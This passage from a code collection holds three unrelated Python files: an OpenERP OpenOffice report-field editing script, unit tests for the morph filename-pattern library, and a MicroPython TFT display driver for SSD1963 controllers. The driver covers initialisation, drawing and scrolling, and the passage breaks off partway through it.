#
# Copyright (c) 2003-2004 Danny Brewer d29583@groovegarden.com
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
#############################################################################
import re
import uno
import string
import unohelper
import xmlrpclib
from com.sun.star.task import XJobExecutor
if __name__<>"package":
from lib.gui import *
from Expression import Expression
from Fields import Fields
from Repeatln import RepeatIn
from lib.error import *
database="test"
uid = 3
class modify(unohelper.Base, XJobExecutor ):
def __init__(self, ctx):
self.ctx = ctx
self.module = "openerp_report"
self.version = "0.1"
# Variable Declaration
desktop = getDesktop()
doc = desktop.getCurrentComponent()
docinfo = doc.getDocumentInfo()
self.oVC = doc.CurrentController.getViewCursor()
if not docinfo.getUserFieldValue(0)=="":
self.sMyHost= docinfo.getUserFieldValue(0)
else:
ErrorDialog(
"Please insert user define field Field-1",
"Just go to File->Properties->User Define \n"
"Field-1 E.g. http://localhost:8069"
)
exit(1)
# Check weather Field-4 is available or not otherwise exit from application
if not docinfo.getUserFieldValue(3) == "" and not docinfo.getUserFieldValue(0)=="":
if self.oVC.TextField:
self.oCurObj=self.oVC.TextField
item = self.oCurObj.Items[0]
kind, group1, group2 = self.getOperation(self.oCurObj.Items[1] )
start_group1 = group1[:group1.find(".")]
stop_group1 = group1[group1.find("."):].replace(".", "/")
if kind == "field":
Fields( start_group1, stop_group1, item, True )
elif kind == "expression":
Expression( group1, item, True )
elif kind == "repeatIn":
RepeatIn( start_group1, group2, stop_group1, item, True )
else:
ErrorDialog(
"Please place your cursor at beginning of field that you want to modify.",""
)
else:
ErrorDialog(
"Please insert user define field Field-1 or Field-4",
"Just go to File->Properties->User Define \n"
"Field-1 E.g. http://localhost:8069 \n"
"OR \n"
"Field-4 E.g. account.invoice"
)
exit(1)
def getOperation(self, str):
#str = "[[ RepeatIn(objects, 'variable') ]]" #repeatIn
#str = "[[ saleorder.partner_id.name ]]" # field
#str = "[[ some thing complex ]]" # expression
method1 = lambda x: (u'repeatIn', x.group(1), x.group(2))
method2 = lambda x: (u'field', x.group(1), None)
method3 = lambda x: (u'expression', x.group(1), None)
regexes = [
('\\[\\[ *repeatIn\\( *(.+)*, *\'([a-zA-Z0-9_]+)\' *\\) *\\]\\]', method1),
('\\[\\[ *([a-zA-Z0-9_\.]+) *\\]\\]', method2),
('\\[\\[ *(.+) *\\]\\]', method3)
]
for (rule,method) in regexes:
res = re.match(rule, str)
if res:
return method(res)
if __name__<>"package":
modify(None)
else:
g_ImplementationHelper.addImplementation( modify, "org.openoffice.openerp.report.modify", ("com.sun.star.task.Job",),)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
milki/morph | morph/tests/test_pattern.py | 1 | 4480 | # test_pattern.py -- Tests for Pattern
"""Tests for Pattern objects"""
from morph import (
pattern
)
from morph.pattern import (
LiteralPattern,
NumericCounterPattern,
)
from morph.errors import (
PatternModeError
)
from morph.tests import TestCase
class PatternTestCase(TestCase):
def gen(self, pat, mode = pattern.MODE_APPEND):
return pattern.generatePattern(pat, mode)
def testGenerate(self):
litPat = self.gen('abc')
self.assertTrue(isinstance(litPat, LiteralPattern))
self.assertEqual(LiteralPattern('abc'), litPat)
litPat = self.gen('abc', mode = pattern.MODE_REPLACE)
self.assertTrue(isinstance(litPat, LiteralPattern))
self.assertEqual(LiteralPattern('abc', mode = pattern.MODE_REPLACE),
litPat)
numcountpat = self.gen('###')
self.assertTrue(isinstance(numcountpat, NumericCounterPattern))
self.assertEqual(NumericCounterPattern(1, 3), numcountpat)
numcountpat = self.gen('###', mode = pattern.MODE_REPLACE)
self.assertTrue(isinstance(numcountpat, NumericCounterPattern))
self.assertEqual(
NumericCounterPattern(1, 3, mode = pattern.MODE_REPLACE),
numcountpat)
class LiteralPatternTestCase(TestCase):
def testApply(self):
appendPat = LiteralPattern('abc')
self.assertEqual('fileabc',
appendPat.apply_to_string('file', 'file', 0))
replacePat = LiteralPattern('abc', pattern.MODE_REPLACE)
self.assertEqual('abc',
replacePat.apply_to_string('file', 'file', 0))
insertPat = LiteralPattern('abc', pattern.MODE_INSERT, 1)
self.assertEqual('fabcile',
insertPat.apply_to_string('file', 'file', 0))
def testStr(self):
appendPat = LiteralPattern('abc')
self.assertEqual('Literal (append, abc)', str(appendPat))
replacePat = LiteralPattern('abc', pattern.MODE_REPLACE)
self.assertEqual('Literal (replace, abc)', str(replacePat))
insertPat = LiteralPattern('abc', pattern.MODE_INSERT, 1)
self.assertEqual('Literal (insert, 1, abc)', str(insertPat))
class NumericCounterPatternTestCase(TestCase):
def testApply(self):
appendPat = NumericCounterPattern()
self.assertEqual('file01',
appendPat.apply_to_string('file', 'file', 0))
self.assertEqual('file02',
appendPat.apply_to_string('file', 'file', 0))
appendPat1 = NumericCounterPattern(50, 3)
self.assertEqual('file050',
appendPat1.apply_to_string('file', 'file', 0))
self.assertEqual('file051',
appendPat1.apply_to_string('file', 'file', 0))
replacePat = NumericCounterPattern(mode=pattern.MODE_REPLACE)
self.assertEqual('01',
replacePat.apply_to_string('file', 'file', 0))
self.assertEqual('02',
replacePat.apply_to_string('file', 'file', 0))
insertPat = NumericCounterPattern(mode = pattern.MODE_INSERT,
position=1)
self.assertEqual('f01ile',
insertPat.apply_to_string('file', 'file', 0))
self.assertEqual('f02ile',
insertPat.apply_to_string('file', 'file', 0))
def testReset(self):
replacePat = NumericCounterPattern(mode=pattern.MODE_REPLACE)
self.assertEqual('01',
replacePat.apply_to_string('file', 'file', 0))
self.assertEqual('02',
replacePat.apply_to_string('file', 'file', 0))
replacePat.reset()
self.assertEqual('01',
replacePat.apply_to_string('file', 'file', 0))
self.assertEqual('02',
replacePat.apply_to_string('file', 'file', 0))
def testStr(self):
appendPat = NumericCounterPattern()
self.assertEqual('NumericCounter (append, 1, 1, 2)', str(appendPat))
replacePat = NumericCounterPattern(mode=pattern.MODE_REPLACE)
self.assertEqual('NumericCounter (replace, 1, 1, 2)', str(replacePat))
insertPat = NumericCounterPattern(mode=pattern.MODE_INSERT,
position=1)
self.assertEqual('NumericCounter (insert, 1, 1, 1, 2)', str(insertPat))
| bsd-2-clause |
peterhinch/micropython-tft-gui | tft/driver/tft.py | 1 | 32591 | #
# The MIT License (MIT)
#
# Copyright (c) 2016 Robert Hammelrath
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Some parts of the software are a port of code provided by Rinky-Dink Electronics, Henning Karlsen,
# with the following copyright notice:
#
## Copyright (C)2015 Rinky-Dink Electronics, Henning Karlsen. All right reserved
## This library is free software; you can redistribute it and/or
## modify it under the terms of the CC BY-NC-SA 3.0 license.
## Please see the included documents for further information.
#
# Class supporting TFT LC-displays with a parallel Interface
# First example: Controller SSD1963 with a 4.3" or 7" display
#
# The minimal connection is:
# X1..X8 for data, Y9 for /Reset, Y10 for /RD, Y11 for /WR and Y12 for /RS
# Then LED must be hard tied to Vcc and /CS to GND.
#
import pyb, stm
from uctypes import addressof
from tft.driver import TFT_io
import gc
# define constants
#
RESET = const(1 << 10) ## Y9
RD = const(1 << 11) ## Y10
WR = const(0x01) ## Y11
D_C = const(0x02) ## Y12
LED = const(1 << 8) ## Y3
POWER = const(1 << 9) ## Y4
## CS is not used and must be hard tied to GND
PORTRAIT = const(1)
LANDSCAPE = const(0)
class TFT:
def __init__(self, controller = "SSD1963", lcd_type = "LB04301", orientation = LANDSCAPE,
v_flip = False, h_flip = False, power_control = True):
self.tft_init(controller, lcd_type, orientation, v_flip, h_flip)
def tft_init(self, controller = "SSD1963", lcd_type = "LB04301", orientation = LANDSCAPE,
v_flip = False, h_flip = False, power_control = True):
#
# For convenience, define X1..X1 and Y9..Y12 as output port using thy python functions.
# X1..X8 will be redefind on the fly as Input by accessing the MODER control registers
# when needed. Y9 is treate seperately, since it is used for Reset, which is done at python level
# since it need long delays anyhow, 5 and 15 ms vs. 10 µs.
#
# Set TFT general defaults
self.controller = controller
self.lcd_type = lcd_type
self.orientation = orientation
self.v_flip = v_flip # flip vertical
self.h_flip = h_flip # flip horizontal
self.c_flip = 0 # flip blue/red
self.rc_flip = 0 # flip row/column
self.setColor((255, 255, 255)) # set FG color to white as can be.
self.setBGColor((0, 0, 0)) # set BG to black
self.bg_buf = bytearray()
#
self.pin_led = None # deferred init Flag
self.power_control = power_control
if self.power_control:
# special treat for Power Pin
self.pin_power = pyb.Pin("Y4", pyb.Pin.OUT_PP)
self.power(True) ## switch Power on
#
pyb.delay(10)
# this may have to be moved to the controller specific section
if orientation == PORTRAIT:
self.setXY = TFT_io.setXY_P
self.drawPixel = TFT_io.drawPixel_P
else:
self.setXY = TFT_io.setXY_L
self.drawPixel = TFT_io.drawPixel_L
self.swapbytes = TFT_io.swapbytes
self.swapcolors = TFT_io.swapcolors
# ----------
for pin_name in ["X1", "X2", "X3", "X4", "X5", "X6", "X7", "X8",
"Y10", "Y11", "Y12"]:
pin = pyb.Pin(pin_name, pyb.Pin.OUT_PP) # set as output
pin.value(1) ## set high as default
# special treat for Reset
self.pin_reset = pyb.Pin("Y9", pyb.Pin.OUT_PP)
# Reset the device
self.pin_reset.value(1) ## do a hard reset
pyb.delay(10)
self.pin_reset.value(0) ## Low
pyb.delay(20)
self.pin_reset.value(1) ## set high again
pyb.delay(20)
#
# Now initialiize the LCD
# This is for the SSD1963 controller and two specific LCDs. More may follow.
# Data taken from the SSD1963 data sheet, SSD1963 Application Note and the LCD Data sheets
#
if controller == "SSD1963": # 1st approach for 480 x 272
TFT_io.tft_cmd_data(0xe2, bytearray(b'\x1d\x02\x54'), 3) # PLL multiplier, set PLL clock to 100M
# N=0x2D for 6.5MHz, 0x1D for 10MHz crystal
# PLLClock = Crystal * (Mult + 1) / (Div + 1)
# The intermediate value Crystal * (Mult + 1) must be between 250MHz and 750 MHz
TFT_io.tft_cmd_data(0xe0, bytearray(b'\x01'), 1) # PLL Enable
pyb.delay(10)
TFT_io.tft_cmd_data(0xe0, bytearray(b'\x03'), 1)
pyb.delay(10)
TFT_io.tft_cmd(0x01) # software reset
pyb.delay(10)
#
# Settings for the LCD
#
# The LCDC_FPR depends on PLL clock and the reccomended LCD Dot clock DCLK
#
# LCDC_FPR = (DCLK * 1048576 / PLLClock) - 1
#
# The other settings are less obvious, since the definitions of the SSD1963 data sheet and the
# LCD data sheets differ. So what' common, even if the names may differ:
# HDP Horizontal Panel width (also called HDISP, Thd). The value store in the register is HDP - 1
# VDP Vertical Panel Width (also called VDISP, Tvd). The value stored in the register is VDP - 1
# HT Total Horizontal Period, also called HP, th... The exact value does not matter
# VT Total Vertical Period, alco called VT, tv, .. The exact value does not matter
# HPW Width of the Horizontal sync pulse, also called HS, thpw.
# VPW Width of the Vertical sync pulse, also called VS, tvpw
# Front Porch (HFP and VFP) Time between the end of display data and the sync pulse
# Back Porch (HBP and VBP Time between the start of the sync pulse and the start of display data.
# HT = FP + HDP + BP and VT = VFP + VDP + VBP (sometimes plus sync pulse width)
# Unfortunately, the controller does not use these front/back porch times, instead it uses an starting time
# in the front porch area and defines (see also figures in chapter 13.3 of the SSD1963 data sheet)
# HPS Time from that horiz. starting point to the start of the horzontal display area
# LPS Time from that horiz. starting point to the horizontal sync pulse
# VPS Time from the vert. starting point to the first line
# FPS Time from the vert. starting point to the vertical sync pulse
#
# So the following relations must be held:
#
# HT > HDP + HPS
# HPS >= HPW + LPS
# HPS = Back Porch - LPS, or HPS = Horizontal back Porch
# VT > VDP + VPS
# VPS >= VPW + FPS
# VPS = Back Porch - FPS, or VPS = Vertical back Porch
#
# LPS or FPS may have a value of zero, since the length of the front porch is detemined by the
# other figures
#
# The best is to start with the recomendations of the lCD data sheet for Back porch, grab a
# sync pulse with and the determine the other, such that they meet the relations. Typically, these
# values allow for some ambuigity.
#
if lcd_type == "LB04301": # Size 480x272, 4.3", 24 Bit, 4.3"
#
# Value Min Typical Max
# DotClock 5 MHZ 9 MHz 12 MHz
# HT (Hor. Total 490 531 612
# HDP (Hor. Disp) 480
# HBP (back porch) 8 43
# HFP (Fr. porch) 2 8
# HPW (Hor. sync) 1
# VT (Vert. Total) 275 288 335
# VDP (Vert. Disp) 272
# VBP (back porch) 2 12
# VFP (fr. porch) 1 4
# VPW (vert. sync) 1 10
#
# This table in combination with the relation above leads to the settings:
# HPS = 43, HPW = 8, LPS = 0, HT = 531
# VPS = 14, VPW = 10, FPS = 0, VT = 288
#
self.disp_x_size = 479
self.disp_y_size = 271
TFT_io.tft_cmd_data_AS(0xe6, bytearray(b'\x01\x70\xa3'), 3) # PLL setting for PCLK
# (9MHz * 1048576 / 100MHz) - 1 = 94371 = 0x170a3
TFT_io.tft_cmd_data_AS(0xb0, bytearray( # # LCD SPECIFICATION
[0x20, # 24 Color bits, HSync/VSync low, No Dithering
0x00, # TFT mode
self.disp_x_size >> 8, self.disp_x_size & 0xff, # physical Width of TFT
self.disp_y_size >> 8, self.disp_y_size & 0xff, # physical Height of TFT
0x00]), 7) # Last byte only required for a serial TFT
TFT_io.tft_cmd_data_AS(0xb4, bytearray(b'\x02\x13\x00\x2b\x08\x00\x00\x00'), 8)
# HSYNC, Set HT 531 HPS 43 HPW=Sync pulse 8 LPS 0
TFT_io.tft_cmd_data_AS(0xb6, bytearray(b'\x01\x20\x00\x0e\x0a\x00\x00'), 7)
# VSYNC, Set VT 288 VPS 14 VPW 10 FPS 0
TFT_io.tft_cmd_data_AS(0x36, bytearray([(orientation & 1) << 5 | (h_flip & 1) << 1 | (v_flip) & 1]), 1)
# rotation/ flip, etc., t.b.d.
elif lcd_type == "AT070TN92": # Size 800x480, 7", 18 Bit, lower color bits ignored
#
# Value Min Typical Max
# DotClock 26.4 MHz 33.3 MHz 46.8 MHz
# HT (Hor. Total 862 1056 1200
# HDP (Hor. Disp) 800
# HBP (back porch) 46 46 46
# HFP (Fr. porch) 16 210 254
# HPW (Hor. sync) 1 40
# VT (Vert. Total) 510 525 650
# VDP (Vert. Disp) 480
# VBP (back porch) 23 23 23
# VFP (fr. porch) 7 22 147
# VPW (vert. sync) 1 20
#
# This table in combination with the relation above leads to the settings:
# HPS = 46, HPW = 8, LPS = 0, HT = 1056
# VPS = 23, VPW = 10, VPS = 0, VT = 525
#
self.disp_x_size = 799
self.disp_y_size = 479
TFT_io.tft_cmd_data_AS(0xe6, bytearray(b'\x05\x53\xf6'), 3) # PLL setting for PCLK
# (33.3MHz * 1048576 / 100MHz) - 1 = 349174 = 0x553f6
TFT_io.tft_cmd_data_AS(0xb0, bytearray( # # LCD SPECIFICATION
[0x00, # 18 Color bits, HSync/VSync low, No Dithering/FRC
0x00, # TFT mode
self.disp_x_size >> 8, self.disp_x_size & 0xff, # physical Width of TFT
self.disp_y_size >> 8, self.disp_y_size & 0xff, # physical Height of TFT
0x00]), 7) # Last byte only required for a serial TFT
TFT_io.tft_cmd_data_AS(0xb4, bytearray(b'\x04\x1f\x00\x2e\x08\x00\x00\x00'), 8)
# HSYNC, Set HT 1056 HPS 46 HPW 8 LPS 0
TFT_io.tft_cmd_data_AS(0xb6, bytearray(b'\x02\x0c\x00\x17\x08\x00\x00'), 7)
# VSYNC, Set VT 525 VPS 23 VPW 08 FPS 0
TFT_io.tft_cmd_data_AS(0x36, bytearray([(orientation & 1) << 5 | (h_flip & 1) << 1 | (v_flip) & 1]), 1)
# rotation/ flip, etc., t.b.d.
else:
print("Wrong Parameter lcd_type: ", lcd_type)
return
TFT_io.tft_cmd_data_AS(0xBA, bytearray(b'\x0f'), 1) # GPIO[3:0] out 1
TFT_io.tft_cmd_data_AS(0xB8, bytearray(b'\x07\x01'), 1) # GPIO3=input, GPIO[2:0]=output
TFT_io.tft_cmd_data_AS(0xf0, bytearray(b'\x00'), 1) # Pixel data Interface 8 Bit
TFT_io.tft_cmd(0x29) # Display on
TFT_io.tft_cmd_data_AS(0xbe, bytearray(b'\x06\xf0\x01\xf0\x00\x00'), 6)
# Set PWM for B/L
TFT_io.tft_cmd_data_AS(0xd0, bytearray(b'\x0d'), 1) # Set DBC: enable, agressive
else:
print("Wrong Parameter controller: ", controller)
return
#
# Set character printing defaults
#
self.text_font = None
self.setTextStyle(self.color, self.BGcolor, 0, None, 0)
#
# Init done. clear Screen and switch BG LED on
#
self.text_x = self.text_y = self.text_yabs = 0
self.clrSCR() # clear the display
# self.backlight(100) ## switch BG LED on
#
# Return screen dimensions
#
def getScreensize(self):
if self.orientation == LANDSCAPE:
return (self.disp_x_size + 1, self.disp_y_size + 1)
else:
return (self.disp_y_size + 1, self.disp_x_size + 1)
#
# set backlight brightness
#
def backlight(self, percent):
# deferred init of LED PIN
if self.pin_led is None:
# special treat for BG LED
self.pin_led = pyb.Pin("Y3", pyb.Pin.OUT_PP)
self.led_tim = pyb.Timer(4, freq=500)
self.led_ch = self.led_tim.channel(3, pyb.Timer.PWM, pin=self.pin_led)
percent = max(0, min(percent, 100))
self.led_ch.pulse_width_percent(percent) # set LED
#
# switch power on/off
#
def power(self, onoff):
if self.power_control:
if onoff:
self.pin_power.value(True) ## switch power on or off
else:
self.pin_power.value(False)
#
# set the tft flip modes
#
def set_tft_mode(self, v_flip = False, h_flip = False, c_flip = False, orientation = LANDSCAPE):
self.v_flip = v_flip # flip vertical
self.h_flip = h_flip # flip horizontal
self.c_flip = c_flip # flip blue/red
self.orientation = orientation # LANDSCAPE/PORTRAIT
TFT_io.tft_cmd_data_AS(0x36,
bytearray([(self.orientation << 5) |(self.c_flip << 3) | (self.h_flip & 1) << 1 | (self.v_flip) & 1]), 1)
# rotation/ flip, etc., t.b.d.
#
# get the tft flip modes
#
def get_tft_mode(self):
return (self.v_flip, self.h_flip, self.c_flip, self.orientation) #
#
# set the color used for the draw commands
#
def setColor(self, fgcolor):
self.color = fgcolor
self.colorvect = bytearray(self.color) # prepare byte array
#
# Set BG color used for the draw commands
#
def setBGColor(self, bgcolor):
self.BGcolor = bgcolor
self.BGcolorvect = bytearray(self.BGcolor) # prepare byte array
self.BMPcolortable = bytearray([self.BGcolorvect[2], # create colortable
self.BGcolorvect[1], self.BGcolorvect[0],0,
self.colorvect[2], self.colorvect[1], self.colorvect[0],0])
#
# get the color used for the draw commands
#
def getColor(self):
return self.color
#
# get BG color used for
#
def getBGColor(self):
return self.BGcolor
#
# Draw a single pixel at location x, y with color
# Rather slow at 40µs/Pixel
#
def drawPixel_py(self, x, y, color):
self.setXY(x, y, x, y)
TFT_io.displaySCR_AS(color, 1) #
#
# clear screen, set it to BG color.
#
def clrSCR(self, color = None):
colorvect = self.BGcolorvect if color is None else bytearray(color)
self.clrXY()
TFT_io.fillSCR_AS(colorvect, (self.disp_x_size + 1) * (self.disp_y_size + 1))
self.setScrollArea(0, self.disp_y_size + 1, 0)
self.setScrollStart(0)
self.setTextPos(0,0)
#
# reset the address range to fullscreen
#
def clrXY(self):
if self.orientation == LANDSCAPE:
self.setXY(0, 0, self.disp_x_size, self.disp_y_size)
else:
self.setXY(0, 0, self.disp_y_size, self.disp_x_size)
#
# Draw a line from x1, y1 to x2, y2 with the color set by setColor()
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def drawLine(self, x1, y1, x2, y2, color = None):
if y1 == y2:
self.drawHLine(x1, y1, x2 - x1 + 1, color)
elif x1 == x2:
self.drawVLine(x1, y1, y2 - y1 + 1, color)
else:
colorvect = self.colorvect if color is None else bytearray(color)
dx, xstep = (x2 - x1, 1) if x2 > x1 else (x1 - x2, -1)
dy, ystep = (y2 - y1, 1) if y2 > y1 else (y1 - y2, -1)
col, row = x1, y1
if dx < dy:
t = - (dy >> 1)
while True:
self.drawPixel(col, row, colorvect)
if row == y2:
return
row += ystep
t += dx
if t >= 0:
col += xstep
t -= dy
else:
t = - (dx >> 1)
while True:
self.drawPixel(col, row, colorvect)
if col == x2:
return
col += xstep
t += dy
if t >= 0:
row += ystep
t -= dx
#
# Draw a horizontal line with 1 Pixel width, from x,y to x + l - 1, y
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def drawHLine(self, x, y, l, color = None): # draw horiontal Line
colorvect = self.colorvect if color is None else bytearray(color)
if l < 0: # negative length, swap parameters
l = -l
x -= l
self.setXY(x, y, x + l - 1, y) # set display window
TFT_io.fillSCR_AS(colorvect, l)
#
# Draw a vertical line with 1 Pixel width, from x,y to x, y + l - 1
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def drawVLine(self, x, y, l, color = None): # draw horiontal Line
colorvect = self.colorvect if color is None else bytearray(color)
if l < 0: # negative length, swap parameters
l = -l
y -= l
self.setXY(x, y, x, y + l - 1) # set display window
TFT_io.fillSCR_AS(colorvect, l)
#
# Draw rectangle from x1, y1, to x2, y2
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def drawRectangle(self, x1, y1, x2, y2, color = None):
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
self.drawHLine(x1, y1, x2 - x1 + 1, color)
self.drawHLine(x1, y2, x2 - x1 + 1, color)
self.drawVLine(x1, y1, y2 - y1 + 1, color)
self.drawVLine(x2, y1, y2 - y1 + 1, color)
#
# Fill rectangle
# Almost straight port from the UTFT Library at Rinky-Dink Electronics
#
def fillRectangle(self, x1, y1, x2, y2, color=None):
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
self.setXY(x1, y1, x2, y2) # set display window
if color:
TFT_io.fillSCR_AS(bytearray(color), (x2 - x1 + 1) * (y2 - y1 + 1))
else:
TFT_io.fillSCR_AS(self.colorvect, (x2 - x1 + 1) * (y2 - y1 + 1))
#
# Draw smooth rectangle from x1, y1, to x2, y2
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def drawClippedRectangle(self, x1, y1, x2, y2, color = None):
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
if (x2-x1) > 4 and (y2-y1) > 4:
colorvect = self.colorvect if color is None else bytearray(color)
self.drawPixel(x1 + 2,y1 + 1, colorvect)
self.drawPixel(x1 + 1,y1 + 2, colorvect)
self.drawPixel(x2 - 2,y1 + 1, colorvect)
self.drawPixel(x2 - 1,y1 + 2, colorvect)
self.drawPixel(x1 + 2,y2 - 1, colorvect)
self.drawPixel(x1 + 1,y2 - 2, colorvect)
self.drawPixel(x2 - 2,y2 - 1, colorvect)
self.drawPixel(x2 - 1,y2 - 2, colorvect)
self.drawHLine(x1 + 3, y1, x2 - x1 - 5, colorvect)
self.drawHLine(x1 + 3, y2, x2 - x1 - 5, colorvect)
self.drawVLine(x1, y1 + 3, y2 - y1 - 5, colorvect)
self.drawVLine(x2, y1 + 3, y2 - y1 - 5, colorvect)
#
# Fill smooth rectangle from x1, y1, to x2, y2
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def fillClippedRectangle(self, x1, y1, x2, y2, color = None):
if x1 > x2:
t = x1; x1 = x2; x2 = t
if y1 > y2:
t = y1; y1 = y2; y2 = t
if (x2-x1) > 4 and (y2-y1) > 4:
for i in range(((y2 - y1) // 2) + 1):
if i == 0:
self.drawHLine(x1 + 3, y1 + i, x2 - x1 - 5, color)
self.drawHLine(x1 + 3, y2 - i, x2 - x1 - 5, color)
elif i == 1:
self.drawHLine(x1 + 2, y1 + i, x2 - x1 - 3, color)
self.drawHLine(x1 + 2, y2 - i, x2 - x1 - 3, color)
elif i == 2:
self.drawHLine(x1 + 1, y1 + i, x2 - x1 - 1, color)
self.drawHLine(x1 + 1, y2 - i, x2 - x1 - 1, color)
else:
self.drawHLine(x1, y1 + i, x2 - x1 + 1, color)
self.drawHLine(x1, y2 - i, x2 - x1 + 1, color)
#
# draw a circle at x, y with radius
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def drawCircle(self, x, y, radius, color = None):
colorvect = self.colorvect if color is None else bytearray(color)
f = 1 - radius
ddF_x = 1
ddF_y = -2 * radius
x1 = 0
y1 = radius
self.drawPixel(x, y + radius, colorvect)
self.drawPixel(x, y - radius, colorvect)
self.drawPixel(x + radius, y, colorvect)
self.drawPixel(x - radius, y, colorvect)
while x1 < y1:
if f >= 0:
y1 -= 1
ddF_y += 2
f += ddF_y
x1 += 1
ddF_x += 2
f += ddF_x
self.drawPixel(x + x1, y + y1, colorvect)
self.drawPixel(x - x1, y + y1, colorvect)
self.drawPixel(x + x1, y - y1, colorvect)
self.drawPixel(x - x1, y - y1, colorvect)
self.drawPixel(x + y1, y + x1, colorvect)
self.drawPixel(x - y1, y + x1, colorvect)
self.drawPixel(x + y1, y - x1, colorvect)
self.drawPixel(x - y1, y - x1, colorvect)
#
# fill a circle at x, y with radius
# Straight port from the UTFT Library at Rinky-Dink Electronics
# Instead of calculating x = sqrt(r*r - y*y), it searches the x
# for r*r = x*x + x*x
#
def fillCircle(self, x, y, radius, color = None):
r_square = radius * radius * 4
for y1 in range (-(radius * 2), 1):
y_square = y1 * y1
for x1 in range (-(radius * 2), 1):
if x1*x1+y_square <= r_square:
x1i = x1 // 2
y1i = y1 // 2
self.drawHLine(x + x1i, y + y1i, 2 * (-x1i), color)
self.drawHLine(x + x1i, y - y1i, 2 * (-x1i), color)
break;
#
# Draw a bitmap at x,y with size sx, sy
# mode determines the type of expected data
# mode = 1: The data contains 1 bit per pixel, mapped to fg/bg color
# unless a colortable is provided
# mode = 2: The data contains 2 bit per pixel; a colortable with 4 entries must be provided
# mode = 4: The data contains 4 bit per pixel;
# a colortable with 16 entries must be provided
# mode = 8: The data contains 8 bit per pixel;
# a colortable with 256 entries must be provided
# mode = 16: The data must contain 2 packed bytes/pixel red/green/blue in 565 format
# mode = 24: The data must contain 3 bytes/pixel red/green/blue
#
def drawBitmap(self, x, y, sx, sy, data, mode = 24, colortable = None):
self.setXY(x, y, x + sx - 1, y + sy - 1)
if mode == 24:
TFT_io.displaySCR_AS(data, sx * sy)
elif mode == 16:
TFT_io.displaySCR565_AS(data, sx * sy)
elif mode == 1:
if colortable is None:
colortable = self.BMPcolortable # create colortable
TFT_io.displaySCR_bmp(data, sx*sy, 1, colortable)
elif mode == 2:
if colortable is None:
return
TFT_io.displaySCR_bmp(data, sx*sy, 2, colortable)
elif mode == 4:
if colortable is None:
return
TFT_io.displaySCR_bmp(data, sx*sy, 4, colortable)
elif mode == 8:
if colortable is None:
return
TFT_io.displaySCR_bmp(data, sx*sy, 8, colortable)
#
# set scroll area to the region between the first and last line
#
def setScrollArea(self, tfa, vsa, bfa):
TFT_io.tft_cmd_data_AS(0x33, bytearray( #set scrolling range
[(tfa >> 8) & 0xff, tfa & 0xff,
(vsa >> 8) & 0xff, vsa & 0xff,
(bfa >> 8) & 0xff, bfa & 0xff]), 6)
self.scroll_tfa = tfa
self.scroll_vsa = vsa
self.scroll_bfa = bfa
self.setScrollStart(self.scroll_tfa)
x, y = self.getTextPos()
self.setTextPos(x, y) # realign pointers
#
# get scroll area of the region between the first and last line
#
def getScrollArea(self):
return self.scroll_tfa, self.scroll_vsa, self.scroll_bfa
#
# set the line which is displayed first
#
def setScrollStart(self, lline):
self.scroll_start = lline # store the logical first line
TFT_io.tft_cmd_data_AS(0x37, bytearray([(lline >> 8) & 0xff, lline & 0xff]), 2)
#
# get the line which is displayed first
#
def getScrollStart(self):
return self.scroll_start # get the logical first line
#
# Scroll vsa up/down by a number of pixels
#
def scroll(self, pixels):
line = ((self.scroll_start - self.scroll_tfa + pixels) % self.scroll_vsa
+ self.scroll_tfa)
self.setScrollStart(line) # set the new line
#
# Set text position
#
def setTextPos(self, x, y, clip = False, scroll = True):
self.text_width, self.text_height = self.getScreensize() ## height possibly wrong
self.text_x = x
if self.scroll_tfa <= y < (self.scroll_tfa + self.scroll_vsa): # in scroll area ? check later for < or <=
# correct position relative to scroll start
self.text_y = (y + self.scroll_start - self.scroll_tfa)
if self.text_y >= (self.scroll_tfa + self.scroll_vsa):
self.text_y -= self.scroll_vsa
else: # absolute
self.text_y = y
self.text_yabs = y
# Hint: self.text_yabs = self.text_y - self.scroll_start) % self.scroll_vsa + self.scroll_tfa)
if clip and (self.text_x + clip) < self.text_width:
self.text_width = self.text_x + clip
self.text_scroll = scroll
#
# Get text position
#
def getTextPos(self, abs = True):
if abs:
return (self.text_x, self.text_yabs)
else:
return (self.text_x, self.text_y)
#
# Set Text Style
#
def setTextStyle(self, fgcolor=None, bgcolor=None, transparency=None, font=None, gap=None):
